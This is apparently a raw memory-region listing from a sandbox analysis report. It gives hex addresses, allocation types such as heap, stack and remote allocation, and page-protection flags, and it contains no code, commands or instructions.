page read and write
24C0000
trusted library allocation
page execute and read and write
3DA6000
heap
page read and write
41F000
system
page execute and read and write
436A000
stack
page read and write
3B5A000
trusted library allocation
page read and write
54F6000
heap
page read and write
18F000
direct allocation
page read and write
4859000
heap
page read and write
8B5000
heap
page read and write
49FB000
trusted library allocation
page read and write
A0E2000
direct allocation
page execute and read and write
6A7000
heap
page read and write
2475000
trusted library allocation
page read and write
1B85B000
heap
page read and write
7BE000
heap
page read and write
4828000
heap
page read and write
55B5000
heap
page read and write
9E0000
heap
page read and write
7FE8AF90000
trusted library allocation
page execute and read and write
327F000
trusted library allocation
page read and write
56BA000
heap
page read and write
922000
trusted library allocation
page read and write
A08E000
direct allocation
page execute and read and write
3E76000
heap
page read and write
3E7E000
heap
page read and write
4EF000
stack
page read and write
4854000
heap
page read and write
A0E6000
direct allocation
page execute and read and write
48D6000
heap
page read and write
1A9B0000
heap
page read and write
6FE000
heap
page read and write
3363000
heap
page read and write
49A000
heap
page read and write
484000
heap
page read and write
7FE898F0000
trusted library allocation
page read and write
597000
heap
page read and write
686000
heap
page read and write
507000
heap
page read and write
5B4000
heap
page read and write
283E000
stack
page read and write
519B000
heap
page read and write
2227000
heap
page read and write
2661000
trusted library allocation
page read and write
2519000
trusted library allocation
page read and write
29B5000
trusted library allocation
page read and write
590000
heap
page read and write
FDC000
trusted library allocation
page read and write
570000
heap
page read and write
3A0000
heap
page read and write
7FE8B100000
trusted library allocation
page read and write
3E5C000
heap
page read and write
10000
heap
page read and write
3283000
trusted library allocation
page read and write
381000
heap
page read and write
33DB000
heap
page read and write
4FBE000
stack
page read and write
2520000
trusted library allocation
page read and write
10000
heap
page read and write
6FF000
heap
page read and write
5FFE000
stack
page read and write
2F6F000
trusted library allocation
page read and write
A060000
direct allocation
page execute and read and write
2775000
heap
page read and write
51D000
heap
page read and write
A012000
direct allocation
page execute and read and write
1C020000
heap
page read and write
27F000
stack
page read and write
569D000
heap
page read and write
61C3000
heap
page read and write
3C87000
trusted library allocation
page read and write
1C48A000
heap
page read and write
7088000
direct allocation
page execute and read and write
4B80000
trusted library allocation
page read and write
3AA0000
trusted library allocation
page read and write
5B5000
heap
page read and write
677000
heap
page read and write
1AF0F000
stack
page read and write
3E11000
heap
page read and write
31F000
heap
page read and write
1CA2000
heap
page read and write
400000
unkown
page readonly
350000
direct allocation
page read and write
3E67000
heap
page read and write
1C32E000
heap
page read and write
A0E0000
direct allocation
page execute and read and write
1A3000
trusted library allocation
page read and write
4661000
heap
page read and write
7A88000
direct allocation
page execute and read and write
4860000
heap
page read and write
5A7000
heap
page read and write
308000
heap
page read and write
3661000
trusted library allocation
page read and write
401000
unkown
page execute read
631000
heap
page read and write
35C9000
trusted library allocation
page read and write
2F7000
heap
page read and write
54F0000
heap
page read and write
4CA000
heap
page read and write
1C410000
heap
page read and write
7FE8B0E0000
trusted library allocation
page read and write
5CC4000
heap
page read and write
408000
unkown
page readonly
465000
heap
page read and write
2840000
trusted library allocation
page read and write
F70000
trusted library allocation
page read and write
1C05B000
heap
page read and write
4DCE000
stack
page read and write | page guard
1DF0000
heap
page read and write
B60000
trusted library allocation
page read and write
267D000
stack
page read and write
490000
heap
page read and write
27F0000
trusted library allocation
page read and write
634000
heap
page read and write
1B825000
heap
page read and write
222BE000
stack
page read and write
391000
heap
page read and write
4B0000
heap
page read and write
210F000
stack
page read and write
F40000
trusted library allocation
page read and write
4AA000
heap
page read and write
E20000
trusted library allocation
page read and write
5869000
heap
page read and write
330000
heap
page read and write
1D5000
trusted library allocation
page execute and read and write
597000
heap
page read and write
363000
heap
page read and write
469A000
heap
page read and write
18C000
stack
page read and write
1C4D000
heap
page read and write
360000
heap
page execute and read and write
18B000
stack
page read and write
460000
heap
page read and write
3E11000
heap
page read and write
1DAC000
heap
page read and write
9FF3000
direct allocation
page execute and read and write
4856000
heap
page read and write
579000
heap
page read and write
5D3A000
heap
page read and write
1B790000
heap
page read and write
3AF000
direct allocation
page read and write
56BD000
heap
page read and write
43E0000
trusted library allocation
page read and write
4A3000
unkown
page readonly
9A0000
direct allocation
page read and write
25AF000
stack
page read and write
904000
heap
page read and write
54F7000
heap
page read and write
3580000
trusted library allocation
page read and write
35F000
heap
page read and write
400000
heap
page read and write
7FFFFF83000
trusted library allocation
page execute read
1A6B0000
heap
page read and write
18C000
stack
page read and write
7FE895F0000
trusted library allocation
page read and write
568B000
heap
page read and write
45C000
unkown
page readonly
448E000
stack
page read and write
1AA4E000
heap
page read and write
56B5000
heap
page read and write
24A0000
heap
page read and write
47E3000
heap
page read and write
9FEB000
direct allocation
page execute and read and write
3BB0000
trusted library allocation
page read and write
2BA3000
trusted library allocation
page read and write
1CB1000
heap
page read and write
25FF000
stack
page read and write
240000
heap
page read and write
2143000
heap
page read and write
7FE89934000
trusted library allocation
page read and write
7FE897C0000
trusted library allocation
page execute and read and write
611000
heap
page read and write
590000
heap
page read and write
A096000
direct allocation
page execute and read and write
593000
heap
page read and write
4A7C000
heap
page read and write
5D2E000
heap
page read and write
56EC000
heap
page read and write
2500000
trusted library allocation
page read and write
400000
unkown
page readonly
1A63A000
stack
page read and write
517000
heap
page read and write
6129000
heap
page read and write
381000
heap
page read and write
A05E000
direct allocation
page execute and read and write
1D0000
heap
page read and write
BAE000
stack
page read and write
E50000
direct allocation
page read and write
6D8000
heap
page read and write
58B6000
heap
page read and write
5C5000
heap
page read and write
4B0000
heap
page read and write
1ABCE000
heap
page read and write
5869000
heap
page read and write
4A3000
unkown
page readonly
A081000
direct allocation
page execute and read and write
42E000
heap
page read and write
41B000
system
page execute and read and write
3B5000
heap
page read and write
379000
heap
page read and write
3BB0000
trusted library allocation
page read and write
39A000
heap
page read and write
48E000
heap
page read and write
1247C000
trusted library allocation
page read and write
7FE898E0000
trusted library allocation
page read and write
3BC0000
trusted library allocation
page read and write
5BC0000
heap
page read and write
1AA0C000
heap
page read and write
1EE6000
heap
page read and write
46AC000
heap
page read and write
A0A5000
direct allocation
page execute and read and write
A09C000
direct allocation
page execute and read and write
367F000
stack
page read and write
A040000
direct allocation
page execute and read and write
24AF000
stack
page read and write
401000
unkown
page execute read
A0AB000
direct allocation
page execute and read and write
1C286000
heap
page read and write
681000
heap
page read and write
270000
heap
page read and write
36CD000
trusted library allocation
page read and write
A038000
direct allocation
page execute and read and write
3419000
heap
page read and write
579000
heap
page read and write
6055000
heap
page read and write
21CB000
heap
page read and write
400000
unkown
page readonly
900000
heap
page read and write
401000
unkown
page execute read
6026000
heap
page read and write
3B0000
heap
page read and write
373000
heap
page read and write
A0B0000
direct allocation
page execute and read and write
3EE000
stack
page read and write
51D3000
heap
page read and write
320000
heap
page execute and read and write
193000
trusted library allocation
page execute and read and write
948000
trusted library allocation
page read and write
32D0000
trusted library allocation
page read and write
5BEF000
heap
page read and write
7FE898ED000
trusted library allocation
page read and write
260000
heap
page read and write
379000
heap
page read and write
400000
unkown
page readonly
3E71000
heap
page read and write
3B4000
heap
page read and write
48A000
heap
page read and write
3E60000
heap
page read and write
A120000
direct allocation
page execute and read and write
2D0000
heap
page read and write
1D60000
heap
page read and write
7FE895D2000
trusted library allocation
page read and write
2D37000
trusted library allocation
page read and write
41B000
system
page execute and read and write
21EA000
heap
page read and write
3C9F000
trusted library allocation
page read and write
33DF000
heap
page read and write
21CC5000
heap
page read and write
579000
heap
page read and write
65F000
heap
page read and write
5678000
remote allocation
page execute and read and write
9DD000
stack
page read and write
4A9F000
stack
page read and write
5578000
heap
page read and write
528E000
stack
page read and write | page guard
569D000
heap
page read and write
1F50000
heap
page read and write
494000
heap
page read and write
41B000
system
page execute and read and write
56C0000
heap
page read and write
39E000
heap
page read and write
2700000
heap
page read and write
349000
heap
page read and write
2165000
heap
page read and write
408000
heap
page read and write
F80000
trusted library allocation
page read and write
A0DE000
direct allocation
page execute and read and write
2520000
heap
page read and write
631000
heap
page read and write
267F000
stack
page read and write
24EF000
stack
page read and write
3949000
trusted library allocation
page read and write
33FF000
heap
page read and write
8D000
stack
page read and write
2F0000
trusted library allocation
page read and write
373000
heap
page read and write
958000
trusted library allocation
page read and write
5C65000
heap
page read and write
1C54A000
heap
page read and write
140000
trusted library allocation
page read and write
4F20000
heap
page read and write
8E88000
direct allocation
page execute and read and write
46BF000
heap
page read and write
47E3000
heap
page read and write
349000
heap
page read and write
558000
heap
page read and write
1A0000
trusted library allocation
page read and write
67A000
heap
page read and write
3E6B000
heap
page read and write
2530000
heap
page read and write
7FE8AE80000
trusted library allocation
page read and write
568B000
heap
page read and write
585A000
heap
page read and write
29FE000
stack
page read and write
46FD000
heap
page read and write
45C000
unkown
page readonly
590000
heap
page read and write
2840000
trusted library allocation
page read and write
E70000
trusted library allocation
page read and write
1CB6000
heap
page read and write
267E000
trusted library allocation
page read and write
A0B7000
direct allocation
page execute and read and write
A096000
direct allocation
page execute and read and write
24EE000
stack
page read and write
BB0000
trusted library allocation
page read and write
4F00000
heap
page read and write
DE0000
direct allocation
page read and write
2587000
trusted library allocation
page read and write
813000
trusted library allocation
page read and write
400000
unkown
page readonly
6BF000
heap
page read and write
D70000
trusted library allocation
page read and write
2D9000
trusted library allocation
page read and write
354000
heap
page read and write
27AF000
stack
page read and write
2A54000
heap
page read and write
7FE895EB000
trusted library allocation
page read and write
56AD000
heap
page read and write
447000
heap
page read and write
35F000
heap
page read and write
459000
unkown
page read and write
240000
trusted library allocation
page read and write
A10000
heap
page read and write
2500000
trusted library allocation
page read and write
5F9000
heap
page read and write
2940000
trusted library allocation
page read and write
393000
heap
page read and write
56B7000
heap
page read and write
27F0000
trusted library allocation
page read and write
7FE8B150000
trusted library allocation
page read and write
5866000
heap
page read and write
2A01000
trusted library allocation
page read and write
2163000
heap
page read and write
167000
stack
page read and write
992000
heap
page read and write
A07B000
direct allocation
page execute and read and write
585D000
heap
page read and write
273F000
stack
page read and write
E90000
trusted library allocation
page read and write
28D000
heap
page read and write
1E14000
heap
page read and write
3D8000
heap
page read and write
11B000
stack
page read and write
47DE000
stack
page read and write
43E000
heap
page read and write
A073000
direct allocation
page execute and read and write
D60000
trusted library allocation
page read and write
8D000
stack
page read and write
5D16000
heap
page read and write
408000
unkown
page readonly
327E000
trusted library allocation
page read and write
5D0E000
stack
page read and write
18A000
trusted library allocation
page execute and read and write
32B1000
trusted library allocation
page read and write
2115000
heap
page read and write
7FE89939000
trusted library allocation
page read and write
5869000
heap
page read and write
1E57000
direct allocation
page read and write
336F000
heap
page read and write
484F000
heap
page read and write
55C000
heap
page read and write
362000
heap
page read and write
1F50000
heap
page read and write
BC0000
trusted library allocation
page read and write
659000
heap
page read and write
740000
heap
page read and write
5CE7000
heap
page read and write
8D0000
heap
page execute and read and write
50CE000
stack
page read and write
1DE9000
heap
page read and write
26FF000
stack
page read and write
8D000
stack
page read and write
4F3F000
stack
page read and write
1B4CB000
stack
page read and write
4B0000
trusted library section
page read and write
D30000
trusted library allocation
page read and write
4A35000
heap
page read and write
497E000
stack
page read and write
10000
heap
page read and write
66D000
heap
page read and write
35F000
heap
page read and write
26AF000
stack
page read and write
5BBC000
heap
page read and write
D80000
trusted library allocation
page read and write
7FE8B165000
trusted library allocation
page read and write
6170000
heap
page read and write
5CD5000
stack
page read and write
A033000
direct allocation
page execute and read and write
E10000
trusted library allocation
page read and write
9B9000
heap
page read and write
5A0000
heap
page read and write
840000
direct allocation
page read and write
DE0000
direct allocation
page read and write
415000
heap
page read and write
4D3000
direct allocation
page read and write
17F000
stack
page read and write
3E63000
heap
page read and write
A083000
direct allocation
page execute and read and write
A0F7000
direct allocation
page execute and read and write
E20000
heap
page execute and read and write
60A8000
heap
page read and write
4C0000
direct allocation
page read and write
180000
trusted library allocation
page read and write
590000
heap
page read and write
D5D000
stack
page read and write
46F000
unkown
page readonly
D7E000
stack
page read and write
518000
heap
page read and write
1AA000
trusted library allocation
page read and write
7FE8B0B0000
trusted library allocation
page read and write
45C000
unkown
page readonly
328B000
trusted library allocation
page read and write
2A0D000
trusted library allocation
page read and write
7FE8AE73000
trusted library allocation
page execute and read and write
35D000
heap
page read and write
38AF000
trusted library allocation
page read and write
5C1E000
heap
page read and write
221A000
heap
page read and write
7FE89940000
trusted library allocation
page read and write
435000
unkown
page read and write
340C000
heap
page read and write
459000
unkown
page read and write
1B310000
heap
page read and write
277000
stack
page read and write
3B5000
heap
page read and write
4707000
heap
page read and write
4A3000
unkown
page readonly
46F000
unkown
page readonly
5544000
heap
page read and write
2C06000
trusted library allocation
page read and write
22CF8000
heap
page read and write
4703000
heap
page read and write
3419000
heap
page read and write
400000
unkown
page readonly
AF0000
trusted library allocation
page read and write
4C30000
trusted library allocation
page execute and read and write
60BF000
heap
page read and write
533D000
stack
page read and write
579000
heap
page read and write
381000
heap
page read and write
2600000
trusted library allocation
page execute and read and write
3900000
trusted library allocation
page read and write
2836000
trusted library allocation
page read and write
1E4F000
stack
page read and write
12501000
trusted library allocation
page read and write
6FB000
heap
page read and write
10000
heap
page read and write
343000
heap
page read and write
223F000
stack
page read and write
820000
direct allocation
page read and write
910000
trusted library allocation
page read and write
58BF000
heap
page read and write
381000
heap
page read and write
4824000
heap
page read and write
35FD000
trusted library allocation
page read and write
1F20000
heap
page read and write
A08C000
direct allocation
page execute and read and write
2313000
trusted library allocation
page read and write
860000
trusted library allocation
page read and write
A09E000
direct allocation
page execute and read and write
400000
system
page execute and read and write
1C680000
heap
page read and write
422000
unkown
page read and write
8D000
stack
page read and write
9E8000
heap
page read and write
9F0000
heap
page read and write
46FE000
heap
page read and write
5C36000
heap
page read and write
FD0000
trusted library allocation
page read and write
D01000
trusted library allocation
page read and write
23C000
stack
page read and write
7FFFFF85000
trusted library allocation
page execute read
680000
trusted library allocation
page read and write
A005000
direct allocation
page execute and read and write
340000
heap
page read and write
2A0000
trusted library allocation
page execute and read and write
377000
heap
page read and write
1CC20000
heap
page read and write
2366000
heap
page read and write
56C0000
heap
page read and write
9FFD000
direct allocation
page execute and read and write
2D0000
trusted library allocation
page read and write
A10C000
direct allocation
page execute and read and write
179000
heap
page read and write
24FF000
stack
page read and write
9FE9000
direct allocation
page execute and read and write
5550000
heap
page read and write
274000
heap
page read and write
267000
heap
page read and write
3DDE000
heap
page read and write
6EC000
heap
page read and write
66C000
heap
page read and write
A11E000
direct allocation
page execute and read and write
8C000
stack
page read and write
7FE8B0D0000
trusted library allocation
page read and write
46FD000
heap
page read and write
3CE000
heap
page read and write
48D0000
trusted library allocation
page read and write
2D0000
direct allocation
page read and write
4707000
heap
page read and write
3E3B000
heap
page read and write
A035000
direct allocation
page execute and read and write
3278000
trusted library allocation
page read and write
3D9C000
heap
page read and write
3420000
trusted library allocation
page read and write
579000
heap
page read and write
66E000
heap
page read and write
3C70000
trusted library allocation
page read and write
4854000
heap
page read and write
619F000
heap
page read and write
38C0000
trusted library allocation
page read and write
67F000
heap
page read and write
7FE897D8000
trusted library allocation
page read and write
18C000
stack
page read and write
435000
heap
page read and write
35A000
heap
page read and write
A0D8000
direct allocation
page execute and read and write
234F000
stack
page read and write
7FE8B110000
trusted library allocation
page read and write
2450000
trusted library allocation
page read and write
64E000
heap
page read and write
1A978000
stack
page read and write
FD0000
trusted library allocation
page execute and read and write
391000
heap
page read and write
1E0000
heap
page read and write
7FE8B170000
trusted library allocation
page read and write
2470000
trusted library allocation
page read and write
4FFF000
heap
page read and write
5CF3000
heap
page read and write
4858000
heap
page read and write
292000
heap
page read and write
554B000
heap
page read and write
27F000
stack
page read and write
486000
heap
page read and write
1CB1000
heap
page read and write
46F6000
heap
page read and write
4A3000
unkown
page readonly
681000
heap
page read and write
2900000
heap
page read and write
671000
heap
page read and write
1AA06000
heap
page read and write
A0C7000
direct allocation
page execute and read and write
7FFFFF20000
trusted library allocation
page execute and read and write
46F000
unkown
page readonly
60FE000
stack
page read and write
49F3000
trusted library allocation
page read and write
2588000
trusted library allocation
page read and write
8CA000
trusted library allocation
page read and write
50DE000
stack
page read and write
48DD000
heap
page read and write
328A000
trusted library allocation
page read and write
3414000
heap
page read and write
80D000
trusted library allocation
page execute and read and write
22E7000
heap
page read and write
46B9000
heap
page read and write
34E000
stack
page read and write
4BF000
heap
page read and write
40A000
unkown
page write copy
370000
heap
page read and write
42F000
unkown
page read and write
557000
heap
page read and write
CB0000
trusted library allocation
page read and write
3490000
trusted library allocation
page read and write
3DBC000
heap
page read and write
6AF000
heap
page read and write
3DBC000
heap
page read and write
4A3000
unkown
page readonly
3A9000
heap
page read and write
980000
direct allocation
page read and write
12678000
trusted library allocation
page read and write
A04A000
direct allocation
page execute and read and write
1AA78000
heap
page read and write
440000
heap
page read and write
7FFFFF85000
trusted library allocation
page execute read
216A000
heap
page read and write
497E000
stack
page read and write
408000
unkown
page readonly
36D000
heap
page read and write
4F5A000
heap
page read and write
2700000
heap
page read and write
408000
unkown
page readonly
310000
heap
page read and write
501000
heap
page read and write
49AD000
stack
page read and write
2CB0000
heap
page read and write
7FE8B0C0000
trusted library allocation
page read and write
7FE8B230000
trusted library allocation
page read and write
37D000
heap
page read and write
3590000
trusted library allocation
page read and write
3BB0000
trusted library allocation
page read and write
4859000
heap
page read and write
383000
heap
page read and write
1DEB000
heap
page read and write
5540000
heap
page read and write
2451000
trusted library allocation
page read and write
30B0000
trusted library allocation
page execute
3E2B000
heap
page read and write
2276000
heap
page read and write
1D2000
trusted library allocation
page read and write
2D0000
trusted library allocation
page read and write
3E0F000
heap
page read and write
1AB4E000
stack
page read and write
A07F000
direct allocation
page execute and read and write
3480000
heap
page read and write
579000
heap
page read and write
430000
trusted library allocation
page read and write
52C0000
heap
page read and write
A001000
direct allocation
page execute and read and write
4A82000
trusted library allocation
page read and write
607000
heap
page read and write
56C0000
heap
page read and write
3C7000
heap
page read and write
240000
heap
page read and write
3E4000
heap
page read and write
408000
unkown
page readonly
20000
heap
page read and write
33FF000
heap
page read and write
2D3D000
trusted library allocation
page read and write
330000
trusted library allocation
page read and write
2A20000
trusted library allocation
page execute read
1A983000
heap
page read and write
56B0000
heap
page read and write
1A6C8000
stack
page read and write
24AE000
stack
page read and write
18E000
stack
page read and write
3416000
heap
page read and write
400000
unkown
page readonly
3412000
heap
page read and write
4796000
heap
page read and write
F50000
trusted library allocation
page read and write
3AE000
stack
page read and write
3DCE000
stack
page read and write
501000
heap
page read and write
530000
heap
page read and write
23EF000
stack
page read and write
5552000
heap
page read and write
5089000
heap
page read and write
45C000
system
page execute and read and write
1AF9C000
stack
page read and write
4828000
heap
page read and write
3E8E000
heap
page read and write
7BF000
heap
page read and write
22370000
heap
page read and write
EF0000
trusted library allocation
page read and write
7FE8B130000
trusted library allocation
page read and write
9FED000
direct allocation
page execute and read and write
20000
heap
page read and write
21F3D000
stack
page read and write
7FE897E0000
trusted library allocation
page read and write
502E000
stack
page read and write
4856000
heap
page read and write
559000
heap
page read and write
1C35A000
stack
page read and write
A048000
direct allocation
page execute and read and write
57F1000
heap
page read and write
2168000
heap
page read and write
6B4000
heap
page read and write
640000
heap
page read and write
1C57C000
heap
page read and write
8488000
direct allocation
page execute and read and write
3DC3000
heap
page read and write
18C000
stack
page read and write
3E59000
heap
page read and write
56BD000
heap
page read and write
35D5000
trusted library allocation
page read and write
1BE8000
heap
page read and write
18C000
stack
page read and write
217A000
heap
page read and write
25F0000
trusted library allocation
page read and write
3280000
trusted library allocation
page read and write
4A3000
unkown
page readonly
10000
heap
page read and write
A064000
direct allocation
page execute and read and write
183000
stack
page read and write
6141000
heap
page read and write
9FD6000
direct allocation
page execute and read and write
A079000
direct allocation
page execute and read and write
575000
heap
page read and write
51CE000
stack
page read and write | page guard
7FE897A0000
trusted library allocation
page execute and read and write
1C6EC000
stack
page read and write
21D6000
heap
page read and write
1C53C000
heap
page read and write
56C4000
heap
page read and write
392000
heap
page read and write
7FE89850000
trusted library allocation
page read and write
43D000
trusted library allocation
page execute and read and write
47E3000
heap
page read and write
528F000
stack
page read and write
400000
unkown
page readonly
18C000
stack
page read and write
2530000
trusted library allocation
page read and write
3F0000
heap
page read and write
46AC000
heap
page read and write
598000
heap
page read and write
3FB000
heap
page read and write
5E0000
heap
page read and write
564F000
heap
page read and write
1DF4000
heap
page read and write
58C1000
heap
page read and write
97E000
stack
page read and write
60EE000
heap
page read and write
45A000
heap
page read and write
920000
trusted library allocation
page read and write
18E000
stack
page read and write
1E9000
heap
page read and write
6188000
heap
page read and write
473000
system
page execute and read and write
585C000
heap
page read and write
2750000
heap
page execute and read and write
3F0000
heap
page read and write
51E000
heap
page read and write
45C000
unkown
page readonly
1F1F000
stack
page read and write
3417000
heap
page read and write
5C2A000
heap
page read and write
2400000
trusted library allocation
page read and write
5B2000
heap
page read and write
43E000
heap
page read and write
300000
heap
page read and write
10000
heap
page read and write
373000
heap
page read and write
671000
heap
page read and write
48FA000
heap
page read and write
2534000
heap
page read and write
28E0000
remote allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
300000
heap
page read and write
3281000
trusted library allocation
page read and write
590000
heap
page read and write
474000
heap
page read and write
2207E000
stack
page read and write
270E000
stack
page read and write | page guard
290000
heap
page read and write
40A000
unkown
page write copy
A110000
direct allocation
page execute and read and write
56CE000
heap
page read and write
270000
heap
page read and write
40A000
unkown
page write copy
56BD000
heap
page read and write
6078000
remote allocation
page execute and read and write
4741000
heap
page read and write
253F000
stack
page read and write
1C4B000
heap
page read and write
6DD000
heap
page read and write
60CB000
heap
page read and write
9FFF000
direct allocation
page execute and read and write
56CC000
heap
page read and write
2492000
trusted library allocation
page read and write
3B40000
trusted library allocation
page read and write
3B5000
heap
page read and write
5AE0000
heap
page read and write
5FC000
heap
page read and write
3DC4000
heap
page read and write
3F7000
heap
page read and write
3E8E000
heap
page read and write
350000
heap
page read and write
1E90000
heap
page execute and read and write
8C000
stack
page read and write
45D000
system
page execute and read and write
3AC000
heap
page read and write
160000
trusted library allocation
page read and write
590000
heap
page read and write
341E000
heap
page read and write
56A1000
heap
page read and write
15D000
trusted library allocation
page execute and read and write
5869000
heap
page read and write
46F000
unkown
page readonly
7FE899A0000
trusted library allocation
page read and write
455000
heap
page read and write
3CE0000
trusted library allocation
page read and write
3B6000
heap
page read and write
1B05E000
stack
page read and write
62C000
heap
page read and write
21E4D000
stack
page read and write
3DC0000
heap
page read and write
920000
heap
page execute and read and write
A11C000
direct allocation
page execute and read and write
2E7000
stack
page read and write
8C0000
heap
page read and write
46FD000
heap
page read and write
4A65000
heap
page read and write
2226000
heap
page read and write
2680000
heap
page read and write
7FE8B1E0000
trusted library allocation
page read and write
D79000
trusted library allocation
page read and write
7FE898C5000
trusted library allocation
page read and write
A0B1000
direct allocation
page execute and read and write
4B60000
trusted library allocation
page execute and read and write
2FFF000
trusted library allocation
page read and write
2927000
trusted library allocation
page read and write
3419000
heap
page read and write
401000
unkown
page execute read
3DA6000
heap
page read and write
91E000
stack
page read and write
400000
system
page execute and read and write
408000
unkown
page readonly
8D000
stack
page read and write
2D39000
trusted library allocation
page read and write
557B000
heap
page read and write
4C0000
heap
page read and write
2620000
trusted library allocation
page read and write
56CC000
heap
page read and write
411B000
stack
page read and write
225BF000
stack
page read and write
1C5C000
heap
page read and write
4A1000
heap
page read and write
27F0000
trusted library allocation
page read and write
5656000
heap
page read and write
52F000
stack
page read and write
4DE000
heap
page read and write
7FE89810000
trusted library allocation
page read and write
7FE89950000
trusted library allocation
page read and write
2470000
trusted library allocation
page read and write
569D000
heap
page read and write
280000
heap
page read and write
555000
heap
page read and write
3A20000
heap
page read and write
922000
heap
page read and write
579000
heap
page read and write
E60000
trusted library allocation
page read and write
DBE000
stack
page read and write
5B27000
heap
page read and write
63DF000
heap
page read and write
3E3C000
heap
page read and write
3287000
trusted library allocation
page read and write
1250F000
trusted library allocation
page read and write
10000
heap
page read and write
1A981000
heap
page read and write
1A738000
stack
page read and write
309000
trusted library allocation
page read and write
1AC78000
heap
page read and write
A0B4000
direct allocation
page execute and read and write
1DC0000
heap
page read and write
340B000
stack
page read and write
6049000
heap
page read and write
7FFFFF83000
trusted library allocation
page execute read
328A000
trusted library allocation
page read and write
17F000
stack
page read and write
74E000
heap
page read and write
7FE896F0000
trusted library allocation
page execute and read and write
355000
heap
page read and write
5578000
heap
page read and write
3E8E000
heap
page read and write
A03E000
direct allocation
page execute and read and write
53F000
heap
page read and write
6A81000
heap
page read and write
1CA9F000
stack
page read and write
3371000
heap
page read and write
3412000
heap
page read and write
45C000
system
page execute and read and write
408000
unkown
page readonly
53C000
heap
page read and write
A099000
direct allocation
page execute and read and write
7FFFFF87000
trusted library allocation
page execute read
3E73000
heap
page read and write
56B000
heap
page read and write
4EC0000
heap
page read and write
257E000
stack
page read and write
36D000
heap
page read and write
2D31000
trusted library allocation
page read and write
5D20000
heap
page read and write
52E2000
heap
page read and write
2470000
trusted library allocation
page read and write
17F000
stack
page read and write
314000
heap
page read and write
4741000
heap
page read and write
3BD000
heap
page read and write
43E0000
trusted library allocation
page read and write
277000
heap
page read and write
40A000
unkown
page write copy
400000
unkown
page readonly
60CF000
stack
page read and write
2DE000
stack
page read and write
3180000
trusted library allocation
page read and write
EC000
stack
page read and write
3941000
trusted library allocation
page read and write
400000
system
page execute and read and write
550000
heap
page read and write
400000
unkown
page readonly
3C2000
heap
page read and write
2F88000
trusted library allocation
page read and write
668000
heap
page read and write
450000
direct allocation
page read and write
35C0000
trusted library allocation
page read and write
170000
trusted library allocation
page read and write
341E000
heap
page read and write
4837000
heap
page read and write
E00000
direct allocation
page read and write
2D36000
trusted library allocation
page read and write
330000
heap
page read and write
6A55000
heap
page read and write
220FE000
stack
page read and write
46A6000
heap
page read and write
50B000
heap
page read and write
6E0000
heap
page read and write
7FE89770000
trusted library allocation
page read and write
47E3000
heap
page read and write
A046000
direct allocation
page execute and read and write
21D8000
heap
page read and write
7FE8AECC000
trusted library allocation
page execute and read and write
2500000
trusted library allocation
page read and write
3A8000
heap
page read and write
5B56000
heap
page read and write
4E1D000
stack
page read and write
5869000
heap
page read and write
290000
direct allocation
page read and write
463000
heap
page read and write
400000
system
page execute and read and write
2630000
trusted library allocation
page read and write
7FE89840000
trusted library allocation
page read and write
7FE8B18C000
trusted library allocation
page read and write
52C4000
heap
page read and write
2840000
trusted library allocation
page read and write
485C000
stack
page read and write
5FDF000
heap
page read and write
2CB5000
heap
page read and write
228B000
heap
page read and write
46B9000
heap
page read and write
3F0000
trusted library section
page read and write
550000
heap
page read and write
8BE000
stack
page read and write | page guard
3B5000
heap
page read and write
26FF000
stack
page read and write
235F000
stack
page read and write
4A39000
heap
page read and write
610000
heap
page read and write
7FFFFF89000
trusted library allocation
page execute read
546E000
stack
page read and write
579000
heap
page read and write
5686000
heap
page read and write
26A2000
trusted library allocation
page read and write
3264000
trusted library allocation
page read and write
56C0000
heap
page read and write
3C7000
heap
page read and write
6E9000
heap
page read and write
48A0000
heap
page read and write
2501000
trusted library allocation
page read and write
890000
heap
page read and write
4A3000
unkown
page readonly
53E000
heap
page read and write
38B0000
trusted library allocation
page read and write
3417000
heap
page read and write
1D7F000
stack
page read and write
968000
heap
page read and write
A05C000
direct allocation
page execute and read and write
1CFE000
heap
page execute and read and write
320000
heap
page read and write
4A6A000
heap
page read and write
3DE000
heap
page read and write
DCD000
stack
page read and write
45C000
system
page execute and read and write
401000
unkown
page execute read
2BA5000
trusted library allocation
page read and write
4861000
heap
page read and write
408000
unkown
page readonly
671000
heap
page read and write
400000
system
page execute and read and write
397000
direct allocation
page read and write
FC0000
trusted library allocation
page execute and read and write
20F3000
heap
page read and write
674000
heap
page read and write
66C000
heap
page read and write
7FE89690000
trusted library allocation
page execute and read and write
6F3000
heap
page read and write
1242F000
trusted library allocation
page read and write
33F5000
heap
page read and write
1CF0000
direct allocation
page read and write
49F0000
trusted library allocation
page read and write
250000
direct allocation
page read and write
26F000
stack
page read and write
574000
heap
page read and write
573000
heap
page read and write
3E8E000
heap
page read and write
327E000
trusted library allocation
page read and write
33BC000
heap
page read and write
50D3000
heap
page read and write
2513000
trusted library allocation
page read and write
1E0000
heap
page read and write
DED000
heap
page read and write
260000
trusted library allocation
page read and write
56B0000
heap
page read and write
3459000
trusted library allocation
page read and write
56C1000
heap
page read and write
245F000
stack
page read and write
46F000
unkown
page readonly
3D0000
direct allocation
page read and write
3E75000
heap
page read and write
430000
direct allocation
page read and write
1C025000
heap
page read and write
4A3000
unkown
page readonly
5869000
heap
page read and write
6D8000
heap
page read and write
46AC000
heap
page read and write
340A000
heap
page read and write
53F000
heap
page read and write
3DBF000
heap
page read and write
2840000
trusted library allocation
page read and write
408000
unkown
page readonly
5578000
heap
page read and write
9FEF000
direct allocation
page execute and read and write
224BF000
stack
page read and write
56BA000
heap
page read and write
1AFA0000
heap
page read and write
5B75000
stack
page read and write
4AF000
stack
page read and write
40A000
unkown
page write copy
3BD000
heap
page read and write
A18000
heap
page read and write
21E0000
heap
page read and write
327A000
trusted library allocation
page read and write
3D0000
heap
page read and write
7FE8AE7D000
trusted library allocation
page execute and read and write
3410000
trusted library allocation
page execute
50F000
heap
page read and write
63F000
stack
page read and write
379000
heap
page read and write
170000
trusted library allocation
page read and write
341E000
heap
page read and write
7FE89820000
trusted library allocation
page read and write
2D6000
heap
page read and write
615000
heap
page read and write
154000
trusted library allocation
page read and write
823E000
stack
page read and write
7FE89970000
trusted library allocation
page read and write
1E2C000
heap
page read and write
2319000
trusted library allocation
page read and write
10000
heap
page read and write
3417000
heap
page read and write
58BF000
heap
page read and write
316000
heap
page read and write
4861000
heap
page read and write
440000
heap
page read and write
1E10000
heap
page read and write
33BC000
heap
page read and write
600000
heap
page read and write
3AC000
heap
page read and write
130000
trusted library section
page read and write
56B7000
heap
page read and write
1C61000
heap
page read and write
4AF000
stack
page read and write
46F000
unkown
page readonly
